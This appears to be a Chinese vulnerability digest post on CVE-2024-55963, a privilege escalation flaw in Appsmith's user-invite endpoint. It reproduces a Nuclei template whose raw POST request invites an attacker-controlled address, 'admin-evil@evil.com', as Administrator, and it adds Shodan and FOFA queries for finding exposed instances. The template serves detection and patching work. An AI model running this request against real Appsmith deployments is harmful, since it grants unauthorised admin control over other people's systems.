Appsmith 权限提升漏洞

漏洞信息

漏洞名称: Appsmith 权限提升漏洞

漏洞编号:

  • CVE: CVE-2024-55963

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: Appsmith是一个开源的、低代码平台,用于构建内部工具和应用程序,广泛应用于企业级服务中,支持快速开发和部署。该平台因其易用性和灵活性,在开发者社区中颇受欢迎。此次发现的漏洞存在于Appsmith的/api/v1/users/invite端点,允许经过认证的用户通过该端点邀请用户作为管理员,从而实现了权限提升。这一漏洞的根本原因在于访问控制机制的缺陷,使得攻击者能够绕过正常的权限检查流程。由于该漏洞允许攻击者将普通用户权限提升至管理员级别,从而获得对Appsmith实例的完全控制权,因此其潜在的安全风险极高。攻击者可以利用这一漏洞进行远程代码执行、数据泄露或服务中断等恶意操作。值得注意的是,利用此漏洞需要攻击者已经拥有一定的认证权限,但一旦利用成功,其影响范围和控制能力将大幅扩展。

产品厂商: appsmith

产品名称: appsmith

影响版本: version < 1.51.0

搜索语法: title=”appsmith”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/1ac0fbef4db15fd23fe9f248fa756b42bf2e774f/http%2Fcves%2F2024%2FCVE-2024-55963.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65

id: CVE-2024-55963

info:
  name: Appsmith - Privilege Escalation
  author: saikir4n
  severity: high
  description: Appsmith contains a privilege escalation vulnerability via the /api/v1/users/invite endpoint that allows an authenticated user to invite a user as Administrator, indicating broken access control.
  impact: |
    An authenticated attacker can escalate privileges to Administrator level, gaining full control over the Appsmith instance.
  remediation: |
    Update Appsmith to version 1.51.0 or later to fix this privilege escalation vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-55963
    - https://github.com/appsmithorg/appsmith/security/advisories/GHSA-jxh3-4vp2-vhjx
    - https://rhinosecuritylabs.com/research/cve-2024-55963-appsmith-rce/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-55963
    cwe-id: CWE-269
  metadata:
    verified: true
    max-request: 1
    vendor: appsmith
    product: appsmith
    shodan-query: http.title:"appsmith"
    fofa-query: title="appsmith"
  tags: cve,cve2024,appsmith,privilege-escalation

http:
  - raw:
      - |
        POST /api/v1/users/invite HTTP/1.1
        Host: {{Hostname}}
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}/applications
        Content-Type: application/json
        X-XSRF-TOKEN: {{xsrf_token}}
        Cookie: XSRF-TOKEN={{xsrf_token}}; SESSION={{session_id}}

        {
          "email": "admin-evil@evil.com",
          "usernames": ["admin-evil"],
          "roleNames": ["Administrator"]
        }
    attack: pitchfork
    payloads:
      xsrf_token:
        - REPLACE_XSRF_TOKEN
      session_id:
        - REPLACE_SESSION_ID
    matchers:
      - type: word
        part: body
        words:
          - "You have been invited to join Appsmith"
          - "inviteToken"
      - type: status
        status:
          - 200
          - 201
    matchers-condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限提升
Appsmith 权限提升漏洞
http://example.com/2025/07/22/github_4157044309/
作者
lianccc
发布于
2025年7月22日
许可协议